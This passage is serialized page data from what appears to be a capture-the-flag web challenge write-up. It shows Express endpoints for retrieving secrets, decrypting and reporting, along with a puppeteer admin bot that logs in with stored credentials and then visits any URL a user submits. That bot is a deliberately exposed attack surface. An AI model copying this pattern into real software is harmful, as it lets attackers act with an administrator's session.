,{"type":33,"tag":128,"props":46915,"children":46916},{"style":306},[46917],{"type":38,"value":5607},{"type":33,"tag":128,"props":46919,"children":46920},{"style":312},[46921],{"type":38,"value":215},{"type":33,"tag":128,"props":46923,"children":46924},{"style":306},[46925],{"type":38,"value":5671},{"type":33,"tag":128,"props":46927,"children":46928},{"style":312},[46929],{"type":38,"value":215},{"type":33,"tag":128,"props":46931,"children":46932},{"style":306},[46933],{"type":38,"value":46934},"cipher",{"type":33,"tag":128,"props":46936,"children":46937},{"style":312},[46938],{"type":38,"value":2966},{"type":33,"tag":128,"props":46940,"children":46941},{"style":312},[46942],{"type":38,"value":762},{"type":33,"tag":128,"props":46944,"children":46945},{"class":130,"line":1063},[46946,46950,46954,46958,46962,46966,46970,46974,46978,46982,46986,46990,46994,46999,47003],{"type":33,"tag":128,"props":46947,"children":46948},{"style":1576},[46949],{"type":38,"value":13615},{"type":33,"tag":128,"props":46951,"children":46952},{"style":306},[46953],{"type":38,"value":5616},{"type":33,"tag":128,"props":46955,"children":46956},{"style":312},[46957],{"type":38,"value":215},{"type":33,"tag":128,"props":46959,"children":46960},{"style":135},[46961],{"type":38,"value":6686},{"type":33,"tag":128,"props":46963,"children":46964},{"style":312},[46965],{"type":38,"value":5566},{"type":33,"tag":128,"props":46967,"children":46968},{"style":523},[46969],{"type":38,"value":6695},{"type":33,"tag":128,"props":46971,"children":46972},{"style":312},[46973],{"type":38,"value":6700},{"type":33,"tag":128,"props":46975,"children":46976},{"style":135},[46977],{"type":38,"value":633},{"type":33,"tag":128,"props":46979,"children":46980},{"style":312},[46981],{"type":38,"value":5836},{"type":33,"tag":128,"props":46983,"children":46984},{"style":437},[46985],{"type":38,"value":14251},{"type":33,"tag":128,"props":46987,"children":46988},{"style":312},[46989],{"type":38,"value":284},{"type":33,"tag":128,"props":46991,"children":46992},{"style":676},[46993],{"type":38,"value":6739},{"type":33,"tag":128,"props":46995,"children":46996},{"style":140},[46997],{"type":38,"value":46998},"Missing cipher",{"type":33,"tag":128,"props":47000,"children":47001},{"style":676},[47002],{"type":38,"value":6040},{"type":33,"tag":128,"props":47004,"children":47005},{"style":312},[47006],{"type":38,"value":5863},{"type":33,"tag":128,"props":47008,"children":47009},{"class":130,"line":1076},[47010],{"type":33,"tag":128,"props":47011,"children":47012},{"style":312},[47013],{"type":38,"value":6760},{"type":33,"tag":128,"props":47015,"children":47016},{"class":130,"line":1089},[47017],{"type":33,"tag":128,"props":47018,"children":47019},{"emptyLinePlaceholder":896},[47020],{"type":38,"value":899},{"type":33,"tag":128,"props":47022,"children":47023},{"class":130,"line":1101},[47024,47028],{"type":33,"tag":128,"props":47025,"children":47026},{"style":1576},[47027],{"type":38,"value":16034},{"type":33,"tag":128,"props":47029,"children":47030},{"style":312},[47031],{"type":38,"value":762},{"type":33,"tag":128,"props":47033,"children":47034},{"class":130,"line":1114},[47035,47039,47043,47047,47052,47056,47060,47064,47068,47072,47076,47080,47084,47088,47092,47096,47100],{"type":33,"tag":128,"props":47036,"children":47037},{"style":300},[47038],{"type":38,"value":15121},{"type":33,"tag":128,"props":47040,"children":47041},{"style":306},[47042],{"type":38,"value":35848},{"type":33,"tag":128,"props":47044,"children":47045},{"style":312},[47046],{"type":38,"value":5657},{"type":33,"tag":128,"props":47048,"children":47049},{"style":135},[47050],{"type":38,"value":47051}," decrypt",{"type":33,"tag":128,"props":47053,"children":47054},{"style":312},[47055],{"type":38,"value":5566},{"type":33,"tag":128,"props":47057,"children":47058},{"style":306},[47059],{"type":38,"value":5607},{"type":33,"tag":128,"props":47061,"children":47062},{"style":312},[47063],{"type":38,"value":215},{"type":33,"tag":128,"props":47065,"children":47066},{"style":306},[47067],{"type":38,"value":5671},{"type":33,"tag":128,"props":47069,"children":47070},{"style":312},[47071],{"type":38,"value":215},{"type":33,"tag":128,"props":47073,"children":47074},{"style":306},[47075],{"type":38,"value":46934},{"type":33,"tag":128,"props":47077,"children":47078},{"style":312},[47079],{"type":38,"value":5584},{"type":33,"tag":128,"props":47081,"children":47082},{"style":306},[47083],{"type":38,"value":5662},{"type":33,"tag":128,"props":47085,"children":47086},{"style":312},[47087],{"type":38,"value":215},{"type":33,"tag":128,"props":47089,"children":47090},{"style":306},[47091],{"type":38,"value":5671},{"type":33,"tag":128,"props":47093,"children":47094},{"style":312},[47095],{"type":38,"value":215},{"type":33,"tag":128,"props":47097,"children":47098},{"style":306},[47099],{"type":38,"value":46812},{"type":33,"tag":128,"props":47101,"children":47102},{"style":312},[47103],{"type":38,"value":5815},{"type":33,"tag":128,"props":47105,"children":47106},{"class":130,"line":1127},[47107,47111,47115,47119,47123,47127,47131,47135,47139,47143,47148,47152,47156],{"type":33,"tag":128,"props":47108,"children":47109},{"style":1576},[47110],{"type":38,"value":13615},{"type":33,"tag":128,"props":47112,"children":47113},{"style":306},[47114],{"type":38,"value":5616},{"type":33,"tag":128,"props":47116,"children":47117},{"style":312},[47118],{"type":38,"value":215},{"type":33,"tag":128,"props":47120,"children":47121},{"style":135},[47122],{"type":38,"value":6686},{"type":33,"tag":128,"props":47124,"children":47125},{"style":312},[47126],{"type":38,"value":5566},{"type":33,"tag":128,"props":47128,"children":47129},{"style":523},[47130],{"type":38,"value":46595},{"type":33,"tag":128,"props":47132,"children":47133},{"style":312},[47134],{"type":38,"value":6700},{"type":33,"tag":128,"props":47136,"children":47137},{"style":135},[47138],{"type":38,"value":633},{"type":33,"tag":128,"props":47140,"children":47141},{"style":312},[47142],{"type":38,"value":5836},{"type":33,"tag":128,"props":47144,"children":47145},{"style":437},[47146],{"type":38,"value":47147}," decrypted",{"type":33,"tag":128,"props":47149,"children":47150},{"style":312},[47151],{"type":38,"value":284},{"type":33,"tag":128,"props":47153,"children":47154},{"style":306},[47155],{"type":38,"value":35848},{"type":33,"tag":128,"props":47157,"children":47158},{"style":312},[47159],{"type":38,"value":5863},{"type":33,"tag":128,"props":47161,"children":47162},{"class":130,"line":1139},[47163,47167,47171,47175,47179,47183],{"type":33,"tag":128,"props":47164,"children":47165},{"style":312},[47166],{"type":38,"value":14264},{"type":33,"tag":128,"props":47168,"children":47169},{"style":1576},[47170],{"type":38,"value":6855},{"type":33,"tag":128,"props":47172,"children":47173},{"style":312},[47174],{"type":38,"value":2852},{"type":33,"tag":128,"props":47176,"children":47177},{"style":306},[47178],{"type":38,"value":23474},{"type":33,"tag":128,"props":47180,"children":47181},{"style":312},[47182],{"type":38,"value":2966},{"type":33,"tag":128,"props":47184,"children":47185},{"style":312},[47186],{"type":38,"value":762},{"type":33,"tag":128,"props":47188,"children":47189},{"class":130,"line":1152},[47190,47194,47198,47202,47206,47210,47214,47218,47222,47226,47230,47234,47238,47243,47247],{"type":33,"tag":128,"props":47191,"children":47192},{"style":1576},[47193],{"type":38,"value":13615},{"type":33,"tag":128,"props":47195,"children":47196},{"style":306},[47197],{"type":38,"value":5616},{"type":33,"tag":128,"props":47199,"children":47200},{"style":312},[47201],{"type":38,"value":215},{"type":33,"tag":128,"props":47203,"children":47204},{"style":135},[47205],{"type":38,"value":6686},{"type":33,"tag":128,"props":47207,"children":47208},{"style":312},[47209],{"type":38,"value":5566},{"type":33,"tag":128,"props":47211,"children":47212},{"style":523},[47213],{"type":38,"value":6695},{"type":33,"tag":128,"props":47215,"children":47216},{"style":312},[47217],{"type":38,"value":6700},{"type":33,"tag":128,"props":47219,"children":47220},{"style":135},[47221],{"type":38,"value":633},{"type":33,"tag":128,"props":47223,"children":47224},{"style":312},[47225],{"type":38,"value":5836},{"type":33,"tag":128,"props":47227,"children":47228},{"style":437},[47229],{"type":38,"value":14251},{"type":33,"tag":128,"props":47231,"children":47232},{"style":312},[47233],{"type":38,"value":284},{"type":33,"tag":128,"props":47235,"children":47236},{"style":676},[47237],{"type":38,"value":6739},{"type":33,"tag":128,"props":47239,"children":47240},{"style":140},[47241],{"type":38,"value":47242},"Invalid key or cipher",{"type":33,"tag":128,"props":47244,"children":47245},{"style":676},[47246],{"type":38,"value":6040},{"type":33,"tag":128,"props":47248,"children":47249},{"style":312},[47250],{"type":38,"value":5863},{"type":33,"tag":128,"props":47252,"children":47253},{"class":130,"line":1165},[47254],{"type":33,"tag":128,"props":47255,"children":47256},{"style":312},[47257],{"type":38,"value":6760},{"type":33,"tag":128,"props":47259,"children":47260},{"class":130,"line":1177},[47261],{"type":33,"tag":128,"props":47262,"children":47263},{"style":312},[47264],{"type":38,"value":5902},{"type":33,"tag":128,"props":47266,"children":47267},{"class":130,"line":1189},[47268],{"type":33,"tag":128,"props":47269,"children":47270},{"emptyLinePlaceholder":896},[47271],{"type":38,"value":899},{"type":33,"tag":128,"props":47273,"children":47274},{"class":130,"line":1202},[47275],{"type":33,"tag":128,"props":47276,"children":47277},{"style":5541},[47278],{"type":38,"value":47279},"// Report any suspicious activity to the admin!\n",{"type":33,"tag":128,"props":47281,"children":47282},{"class":130,"line":1214},[47283,47287,47291,47295,47299,47303,47308,47312,47316,47321],{"type":33,"tag":128,"props":47284,"children":47285},{"style":306},[47286],{"type":38,"value":5552},{"type":33,"tag":128,"props":47288,"children":47289},{"style":312},[47290],{"type":38,"value":215},{"type":33,"tag":128,"props":47292,"children":47293},{"style":135},[47294],{"type":38,"value":5561},{"type":33,"tag":128,"props":47296,"children":47297},{"style":312},[47298],{"type":38,"value":5566},{"type":33,"tag":128,"props":47300,"children":47301},{"style":676},[47302],{"type":38,"value":6040},{"type":33,"tag":128,"props":47304,"children":47305},{"style":140},[47306],{"type":38,"value":47307},"/report",{"type":33,"tag":128,"props":47309,"children":47310},{"style":676},[47311],{"type":38,"value":6040},{"type":33,"tag":128,"props":47313,"children":47314},{"style":312},[47315],{"type":38,"value":5584},{"type":33,"tag":128,"props":47317,"children":47318},{"style":306},[47319],{"type":38,"value":47320}," doReportHandler",{"type":33,"tag":128,"props":47322,"children":47323},{"style":312},[47324],{"type":38,"value":5815},{"type":33,"tag":239,"props":47326,"children":47327},{},[47328,47333,47338],{"type":33,"tag":243,"props":47329,"children":47330},{},[47331],{"type":38,"value":47332},"GET /secret - When a client sends a GET request to the /secret endpoint, the server will retrieve the secret associated with the user's session using the userId stored in the session. If the secret is found, the server will return a 200 OK response with a secret field in the JSON response body. If the secret is not found, the server will return a 400 Bad Request response with a error field indicating that no secret was found.",{"type":33,"tag":243,"props":47334,"children":47335},{},[47336],{"type":38,"value":47337},"POST /decrypt - When a client sends a POST request to the /decrypt endpoint with a cipher and secret in the request body, the server will attempt to decrypt the cipher using the secret. If either the secret or cipher is missing, the server will return a 400 Bad Request response with a error field indicating that one of the required fields is missing. If the decryption fails, the server will return a 400 Bad Request response with a error field indicating that the key or cipher is invalid. If the decryption is successful, the server will return a 200 OK response with a decrypted field in the JSON response body.",{"type":33,"tag":243,"props":47339,"children":47340},{},[47341],{"type":38,"value":47342},"POST /report - When a client sends a POST request to the /report endpoint, the server will handle the request using the doReportHandler function, which appears to be responsible for reporting suspicious activity to the admin.",{"type":33,"tag":47,"props":47344,"children":47345},{},[47346,47348,47354],{"type":38,"value":47347},"The function ",{"type":33,"tag":105,"props":47349,"children":47351},{"className":47350},[],[47352],{"type":38,"value":47353},"doReportHandler",{"type":38,"value":47355}," will trigger a puppeteer script:",{"type":33,"tag":114,"props":47357,"children":47358},{"lang":5526},[47359],{"type":33,"tag":119,"props":47360,"children":47362},{"code":47361,"language":5526,"meta":8,"className":5530,"style":8},"const puppeteer = require('puppeteer')\n\n// please note that 127.0.0.1 and localhost are considered different hosts\n// due to ingress networking rules a container can't reach itself through the it's external IP, so you'd have to use the internal ports (80, 8080) and 127.0.0.1\n\nconst LOGIN_URL = \"http://127.0.0.1/login\";\n\nlet browser = null\n\nconst visit = async (url) => {\n const ctx = await browser.createIncognitoBrowserContext()\n const page = await ctx.newPage()\n\n await page.goto(LOGIN_URL, { waitUntil: 'networkidle2' })\n await page.waitForSelector('form')\n await page.type('wired-input[name=username]', process.env.USERNAME)\n await page.type('wired-input[name=password]', process.env.PASSWORD)\n await page.click('wired-button')\n\n try {\n await page.goto(url, { waitUntil: 'networkidle2' })\n } finally {\n await page.close()\n await ctx.close()\n }\n}\n\nconst doReportHandler = async (req, res) => {\n\n if (!browser) {\n console.log('[INFO] Starting browser')\n browser = await puppeteer.launch({\n args: [\n ...\n ]\n })\n }\n\n const url = req.body.url\n if (\n url === undefined ||\n (!url.startsWith('http://') && !url.startsWith('https://'))\n ) {\n return res.status(400).send({ error: 'Invalid URL' })\n }\n\n try {\n await visit(url)\n return res.sendStatus(200)\n } catch (e) {\n return res.status(400).send({ error: e.message })\n }\n}\n\nmodule.exports = { doReportHandler }\n",[47363],{"type":33,"tag":105,"props":47364,"children":47365},{"__ignoreMap":8},[47366,47408,47415,47423,47431,47438,47471,47478,47497,47504,47543,47580,47616,47623,47684,47724,47790,47855,47895,47902,47913,47972,47988,48011,48034,48041,48048,48055,48102,48109,48137,48173,48207,48223,48231,48239,48247,48254,48261,48297,48308,48330,48416,48428,48492,48499,48506,48517,48540,48572,48600,48665,48673,48681,48689],{"type":33,"tag":128,"props":47367,"children":47368},{"class":130,"line":131},[47369,47373,47378,47382,47387,47391,47395,47400,47404],{"type":33,"tag":128,"props":47370,"children":47371},{"style":300},[47372],{"type":38,"value":15973},{"type":33,"tag":128,"props":47374,"children":47375},{"style":306},[47376],{"type":38,"value":47377}," puppeteer",{"type":33,"tag":128,"props":47379,"children":47380},{"style":312},[47381],{"type":38,"value":5657},{"type":33,"tag":128,"props":47383,"children":47384},{"style":135},[47385],{"type":38,"value":47386}," require",{"type":33,"tag":128,"props":47388,"children":47389},{"style":312},[47390],{"type":38,"value":5566},{"type":33,"tag":128,"props":47392,"children":47393},{"style":676},[47394],{"type":38,"value":6040},{"type":33,"tag":128,"props":47396,"children":47397},{"style":140},[47398],{"type":38,"value":47399},"puppeteer",{"type":33,"tag":128,"props":47401,"children":47402},{"style":676},[47403],{"type":38,"value":6040},{"type":33,"tag":128,"props":47405,"children":47406},{"style":312},[47407],{"type":38,"value":2427},{"type":33,"tag":128,"props":47409,"children":47410},{"class":130,"line":362},[47411],{"type":33,"tag":128,"props":47412,"children":47413},{"emptyLinePlaceholder":896},[47414],{"type":38,"value":899},{"type":33,"tag":128,"props":47416,"children":47417},{"class":130,"line":403},[47418],{"type":33,"tag":128,"props":47419,"children":47420},{"style":5541},[47421],{"type":38,"value":47422},"// please note that 127.0.0.1 and localhost are considered different hosts\n",{"type":33,"tag":128,"props":47424,"children":47425},{"class":130,"line":739},[47426],{"type":33,"tag":128,"props":47427,"children":47428},{"style":5541},[47429],{"type":38,"value":47430},"// due to ingress networking rules a container can't reach itself through the it's external IP, so you'd have to use the internal ports (80, 8080) and 127.0.0.1\n",{"type":33,"tag":128,"props":47432,"children":47433},{"class":130,"line":765},[47434],{"type":33,"tag":128,"props":47435,"children":47436},{"emptyLinePlaceholder":896},[47437],{"type":38,"value":899},{"type":33,"tag":128,"props":47439,"children":47440},{"class":130,"line":804},[47441,47445,47450,47454,47458,47463,47467],{"type":33,"tag":128,"props":47442,"children":47443},{"style":300},[47444],{"type":38,"value":15973},{"type":33,"tag":128,"props":47446,"children":47447},{"style":306},[47448],{"type":38,"value":47449}," LOGIN_URL",{"type":33,"tag":128,"props":47451,"children":47452},{"style":312},[47453],{"type":38,"value":5657},{"type":33,"tag":128,"props":47455,"children":47456},{"style":676},[47457],{"type":38,"value":679},{"type":33,"tag":128,"props":47459,"children":47460},{"style":140},[47461],{"type":38,"value":47462},"http://127.0.0.1/login",{"type":33,"tag":128,"props":47464,"children":47465},{"style":676},[47466],{"type":38,"value":669},{"type":33,"tag":128,"props":47468,"children":47469},{"style":312},[47470],{"type":38,"value":5676},{"type":33,"tag":128,"props":47472,"children":47473},{"class":130,"line":839},[47474],{"type":33,"tag":128,"props":47475,"children":47476},{"emptyLinePlaceholder":896},[47477],{"type":38,"value":899},{"type":33,"tag":128,"props":47479,"children":47480},{"class":130,"line":848},[47481,47485,47489,47493],{"type":33,"tag":128,"props":47482,"children":47483},{"style":300},[47484],{"type":38,"value":7548},{"type":33,"tag":128,"props":47486,"children":47487},{"style":306},[47488],{"type":38,"value":23581},{"type":33,"tag":128,"props":47490,"children":47491},{"style":312},[47492],{"type":38,"value":5657},{"type":33,"tag":128,"props":47494,"children":47495},{"style":300},[47496],{"type":38,"value":41308},{"type":33,"tag":128,"props":47498,"children":47499},{"class":130,"line":976},[47500],{"type":33,"tag":128,"props":47501,"children":47502},{"emptyLinePlaceholder":896},[47503],{"type":38,"value":899},{"type":33,"tag":128,"props":47505,"children":47506},{"class":130,"line":988},[47507,47511,47515,47519,47523,47527,47531,47535,47539],{"type":33,"tag":128,"props":47508,"children":47509},{"style":300},[47510],{"type":38,"value":15973},{"type":33,"tag":128,"props":47512,"children":47513},{"style":135},[47514],{"type":38,"value":23404},{"type":33,"tag":128,"props":47516,"children":47517},{"style":312},[47518],{"type":38,"value":5657},{"type":33,"tag":128,"props":47520,"children":47521},{"style":300},[47522],{"type":38,"value":5598},{"type":33,"tag":128,"props":47524,"children":47525},{"style":312},[47526],{"type":38,"value":2852},{"type":33,"tag":128,"props":47528,"children":47529},{"style":306},[47530],{"type":38,"value":13952},{"type":33,"tag":128,"props":47532,"children":47533},{"style":312},[47534],{"type":38,"value":2966},{"type":33,"tag":128,"props":47536,"children":47537},{"style":312},[47538],{"type":38,"value":5625},{"type":33,"tag":128,"props":47540,"children":47541},{"style":312},[47542],{"type":38,"value":762},{"type":33,"tag":128,"props":47544,"children":47545},{"class":130,"line":1001},[47546,47550,47555,47559,47563,47567,47571,47576],{"type":33,"tag":128,"props":47547,"children":47548},{"style":300},[47549],{"type":38,"value":5696},{"type":33,"tag":128,"props":47551,"children":47552},{"style":306},[47553],{"type":38,"value":47554}," ctx",{"type":33,"tag":128,"props":47556,"children":47557},{"style":312},[47558],{"type":38,"value":5657},{"type":33,"tag":128,"props":47560,"children":47561},{"style":1576},[47562],{"type":38,"value":5796},{"type":33,"tag":128,"props":47564,"children":47565},{"style":306},[47566],{"type":38,"value":23581},{"type":33,"tag":128,"props":47568,"children":47569},{"style":312},[47570],{"type":38,"value":215},{"type":33,"tag":128,"props":47572,"children":47573},{"style":135},[47574],{"type":38,"value":47575},"createIncognitoBrowserContext",{"type":33,"tag":128,"props":47577,"children":47578},{"style":312},[47579],{"type":38,"value":7857},{"type":33,"tag":128,"props":47581,"children":47582},{"class":130,"line":1014},[47583,47587,47592,47596,47600,47604,47608,47612],{"type":33,"tag":128,"props":47584,"children":47585},{"style":300},[47586],{"type":38,"value":5696},{"type":33,"tag":128,"props":47588,"children":47589},{"style":306},[47590],{"type":38,"value":47591}," page",{"type":33,"tag":128,"props":47593,"children":47594},{"style":312},[47595],{"type":38,"value":5657},{"type":33,"tag":128,"props":47597,"children":47598},{"style":1576},[47599],{"type":38,"value":5796},{"type":33,"tag":128,"props":47601,"children":47602},{"style":306},[47603],{"type":38,"value":47554},{"type":33,"tag":128,"props":47605,"children":47606},{"style":312},[47607],{"type":38,"value":215},{"type":33,"tag":128,"props":47609,"children":47610},{"style":135},[47611],{"type":38,"value":23635},{"type":33,"tag":128,"props":47613,"children":47614},{"style":312},[47615],{"type":38,"value":7857},{"type":33,"tag":128,"props":47617,"children":47618},{"class":130,"line":1026},[47619],{"type":33,"tag":128,"props":47620,"children":47621},{"emptyLinePlaceholder":896},[47622],{"type":38,"value":899},{"type":33,"tag":128,"props":47624,"children":47625},{"class":130,"line":1038},[47626,47630,47634,47638,47642,47646,47650,47654,47658,47663,47667,47671,47676,47680],{"type":33,"tag":128,"props":47627,"children":47628},{"style":1576},[47629],{"type":38,"value":6768},{"type":33,"tag":128,"props":47631,"children":47632},{"style":306},[47633],{"type":38,"value":47591},{"type":33,"tag":128,"props":47635,"children":47636},{"style":312},[47637],{"type":38,"value":215},{"type":33,"tag":128,"props":47639,"children":47640},{"style":135},[47641],{"type":38,"value":23659},{"type":33,"tag":128,"props":47643,"children":47644},{"style":312},[47645],{"type":38,"value":5566},{"type":33,"tag":128,"props":47647,"children":47648},{"style":306},[47649],{"type":38,"value":23668},{"type":33,"tag":128,"props":47651,"children":47652},{"style":312},[47653],{"type":38,"value":5584},{"type":33,"tag":128,"props":47655,"children":47656},{"style":312},[47657],{"type":38,"value":5642},{"type":33,"tag":128,"props":47659,"children":47660},{"style":437},[47661],{"type":38,"value":47662}," waitUntil",{"type":33,"tag":128,"props":47664,"children":47665},{"style":312},[47666],{"type":38,"value":284},{"type":33,"tag":128,"props":47668,"children":47669},{"style":676},[47670],{"type":38,"value":6739},{"type":33,"tag":128,"props":47672,"children":47673},{"style":140},[47674],{"type":38,"value":47675},"networkidle2",{"type":33,"tag":128,"props":47677,"children":47678},{"style":676},[47679],{"type":38,"value":6040},{"type":33,"tag":128,"props":47681,"children":47682},{"style":312},[47683],{"type":38,"value":13305},{"type":33,"tag":128,"props":47685,"children":47686},{"class":130,"line":1051},[47687,47691,47695,47699,47704,47708,47712,47716,47720],{"type":33,"tag":128,"props":47688,"children":47689},{"style":1576},[47690],{"type":38,"value":6768},{"type":33,"tag":128,"props":47692,"children":47693},{"style":306},[47694],{"type":38,"value":47591},{"type":33,"tag":128,"props":47696,"children":47697},{"style":312},[47698],{"type":38,"value":215},{"type":33,"tag":128,"props":47700,"children":47701},{"style":135},[47702],{"type":38,"value":47703},"waitForSelector",{"type":33,"tag":128,"props":47705,"children":47706},{"style":312},[47707],{"type":38,"value":5566},{"type":33,"tag":128,"props":47709,"children":47710},{"style":676},[47711],{"type":38,"value":6040},{"type":33,"tag":128,"props":47713,"children":47714},{"style":140},[47715],{"type":38,"value":14844},{"type":33,"tag":128,"props":47717,"children":47718},{"style":676},[47719],{"type":38,"value":6040},{"type":33,"tag":128,"props":47721,"children":47722},{"style":312},[47723],{"type":38,"value":2427},{"type":33,"tag":128,"props":47725,"children":47726},{"class":130,"line":1063},[47727,47731,47735,47739,47743,47747,47751,47756,47760,47764,47769,47773,47777,47781,47786],{"type":33,"tag":128,"props":47728,"children":47729},{"style":1576},[47730],{"type":38,"value":6768},{"type":33,"tag":128,"props":47732,"children":47733},{"style":306},[47734],{"type":38,"value":47591},{"type":33,"tag":128,"props":47736,"children":47737},{"style":312},[47738],{"type":38,"value":215},{"type":33,"tag":128,"props":47740,"children":47741},{"style":135},[47742],{"type":38,"value":14078},{"type":33,"tag":128,"props":47744,"children":47745},{"style":312},[47746],{"type":38,"value":5566},{"type":33,"tag":128,"props":47748,"children":47749},{"style":676},[47750],{"type":38,"value":6040},{"type":33,"tag":128,"props":47752,"children":47753},{"style":140},[47754],{"type":38,"value":47755},"wired-input[name=username]",{"type":33,"tag":128,"props":47757,"children":47758},{"style":676},[47759],{"type":38,"value":6040},{"type":33,"tag":128,"props":47761,"children":47762},{"style":312},[47763],{"type":38,"value":5584},{"type":33,"tag":128,"props":47765,"children":47766},{"style":306},[47767],{"type":38,"value":47768}," process",{"type":33,"tag":128,"props":47770,"children":47771},{"style":312},[47772],{"type":38,"value":215},{"type":33,"tag":128,"props":47774,"children":47775},{"style":306},[47776],{"type":38,"value":44351},{"type":33,"tag":128,"props":47778,"children":47779},{"style":312},[47780],{"type":38,"value":215},{"type":33,"tag":128,"props":47782,"children":47783},{"style":306},[47784],{"type":38,"value":47785},"USERNAME",{"type":33,"tag":128,"props":47787,"children":47788},{"style":312},[47789],{"type":38,"value":2427},{"type":33,"tag":128,"props":47791,"children":47792},{"class":130,"line":1076},[47793,47797,47801,47805,47809,47813,47817,47822,47826,47830,47834,47838,47842,47846,47851],{"type":33,"tag":128,"props":47794,"children":47795},{"style":1576},[47796],{"type":38,"value":6768},{"type":33,"tag":128,"props":47798,"children":47799},{"style":306},[47800],{"type":38,"value":47591},{"type":33,"tag":128,"props":47802,"children":47803},{"style":312},[47804],{"type":38,"value":215},{"type":33,"tag":128,"props":47806,"children":47807},{"style":135},[47808],{"type":38,"value":14078},{"type":33,"tag":128,"props":47810,"children":47811},{"style":312},[47812],{"type":38,"value":5566},{"type":33,"tag":128,"props":47814,"children":47815},{"style":676},[47816],{"type":38,"value":6040},{"type":33,"tag":128,"props":47818,"children":47819},{"style":140},[47820],{"type":38,"value":47821},"wired-input[name=password]",{"type":33,"tag":128,"props":47823,"children":47824},{"style":676},[47825],{"type":38,"value":6040},{"type":33,"tag":128,"props":47827,"children":47828},{"style":312},[47829],{"type":38,"value":5584},{"type":33,"tag":128,"props":47831,"children":47832},{"style":306},[47833],{"type":38,"value":47768},{"type":33,"tag":128,"props":47835,"children":47836},{"style":312},[47837],{"type":38,"value":215},{"type":33,"tag":128,"props":47839,"children":47840},{"style":306},[47841],{"type":38,"value":44351},{"type":33,"tag":128,"props":47843,"children":47844},{"style":312},[47845],{"type":38,"value":215},{"type":33,"tag":128,"props":47847,"children":47848},{"style":306},[47849],{"type":38,"value":47850},"PASSWORD",{"type":33,"tag":128,"props":47852,"children":47853},{"style":312},[47854],{"type":38,"value":2427},{"type":33,"tag":128,"props":47856,"children":47857},{"class":130,"line":1089},[47858,47862,47866,47870,47874,47878,47882,47887,47891],{"type":33,"tag":128,"props":47859,"children":47860},{"style":1576},[47861],{"type":38,"value":6768},{"type":33,"tag":128,"props":47863,"children":47864},{"style":306},[47865],{"type":38,"value":47591},{"type":33,"tag":128,"props":47867,"children":47868},{"style":312},[47869],{"type":38,"value":215},{"type":33,"tag":128,"props":47871,"children":47872},{"style":135},[47873],{"type":38,"value":7852},{"type":33,"tag":128,"props":47875,"children":47876},{"style":312},[47877],{"type":38,"value":5566},{"type":33,"tag":128,"props":47879,"children":47880},{"style":676},[47881],{"type":38,"value":6040},{"type":33,"tag":128,"props":47883,"children":47884},{"style":140},[47885],{"type":38,"value":47886},"wired-button",{"type":33,"tag":128,"props":47888,"children":47889},{"style":676},[47890],{"type":38,"value":6040},{"type":33,"tag":128,"props":47892,"children":47893},{"style":312},[47894],{"type":38,"value":2427},{"type":33,"tag":128,"props":47896,"children":47897},{"class":130,"line":1101},[47898],{"type":33,"tag":128,"props":47899,"children":47900},{"emptyLinePlaceholder":896},[47901],{"type":38,"value":899},{"type":33,"tag":128,"props":47903,"children":47904},{"class":130,"line":1114},[47905,47909],{"type":33,"tag":128,"props":47906,"children":47907},{"style":1576},[47908],{"type":38,"value":16034},{"type":33,"tag":128,"props":47910,"children":47911},{"style":312},[47912],{"type":38,"value":762},{"type":33,"tag":128,"props":47914,"children":47915},{"class":130,"line":1127},[47916,47920,47924,47928,47932,47936,47940,47944,47948,47952,47956,47960,47964,47968],{"type":33,"tag":128,"props":47917,"children":47918},{"style":1576},[47919],{"type":38,"value":17718},{"type":33,"tag":128,"props":47921,"children":47922},{"style":306},[47923],{"type":38,"value":47591},{"type":33,"tag":128,"props":47925,"children":47926},{"style":312},[47927],{"type":38,"value":215},{"type":33,"tag":128,"props":47929,"children":47930},{"style":135},[47931],{"type":38,"value":23659},{"type":33,"tag":128,"props":47933,"children":47934},{"style":312},[47935],{"type":38,"value":5566},{"type":33,"tag":128,"props":47937,"children":47938},{"style":306},[47939],{"type":38,"value":13952},{"type":33,"tag":128,"props":47941,"children":47942},{"style":312},[47943],{"type":38,"value":5584},{"type":33,"tag":128,"props":47945,"children":47946},{"style":312},[47947],{"type":38,"value":5642},{"type":33,"tag":128,"props":47949,"children":47950},{"style":437},[47951],{"type":38,"value":47662},{"type":33,"tag":128,"props":47953,"children":47954},{"style":312},[47955],{"type":38,"value":284},{"type":33,"tag":128,"props":47957,"children":47958},{"style":676},[47959],{"type":38,"value":6739},{"type":33,"tag":128,"props":47961,"children":47962},{"style":140},[47963],{"type":38,"value":47675},{"type":33,"tag":128,"props":47965,"children":47966},{"style":676},[47967],{"type":38,"value":6040},{"type":33,"tag":128,"props":47969,"children":47970},{"style":312},[47971],{"type":38,"value":13305},{"type":33,"tag":128,"props":47973,"children":47974},{"class":130,"line":1139},[47975,47979,47984],{"type":33,"tag":128,"props":47976,"children":47977},{"style":312},[47978],{"type":38,"value":14264},{"type":33,"tag":128,"props":47980,"children":47981},{"style":1576},[47982],{"type":38,"value":47983}," finally",{"type":33,"tag":128,"props":47985,"children":47986},{"style":312},[47987],{"type":38,"value":762},{"type":33,"tag":128,"props":47989,"children":47990},{"class":130,"line":1152},[47991,47995,47999,48003,48007],{"type":33,"tag":128,"props":47992,"children":47993},{"style":1576},[47994],{"type":38,"value":17718},{"type":33,"tag":128,"props":47996,"children":47997},{"style":306},[47998],{"type":38,"value":47591},{"type":33,"tag":128,"props":48000,"children":48001},{"style":312},[48002],{"type":38,"value":215},{"type":33,"tag":128,"props":48004,"children":48005},{"style":135},[48006],{"type":38,"value":23692},{"type":33,"tag":128,"props":48008,"children":48009},{"style":312},[48010],{"type":38,"value":7857},{"type":33,"tag":128,"props":48012,"children":48013},{"class":130,"line":1165},[48014,48018,48022,48026,48030],{"type":33,"tag":128,"props":48015,"children":48016},{"style":1576},[48017],{"type":38,"value":17718},{"type":33,"tag":128,"props":48019,"children":48020},{"style":306},[48021],{"type":38,"value":47554},{"type":33,"tag":128,"props":48023,"children":48024},{"style":312},[48025],{"type":38,"value":215},{"type":33,"tag":128,"props":48027,"children":48028},{"style":135},[48029],{"type":38,"value":23692},{"type":33,"tag":128,"props":48031,"children":48032},{"style":312},[48033],{"type":38,"value":7857},{"type":33,"tag":128,"props":48035,"children":48036},{"class":130,"line":1177},[48037],{"type":33,"tag":128,"props":48038,"children":48039},{"style":312},[48040],{"type":38,"value":6760},{"type":33,"tag":128,"props":48042,"children":48043},{"class":130,"line":1189},[48044],{"type":33,"tag":128,"props":48045,"children":48046},{"style":312},[48047],{"type":38,"value":854},{"type":33,"tag":128,"props":48049,"children":48050},{"class":130,"line":1202},[48051],{"type":33,"tag":128,"props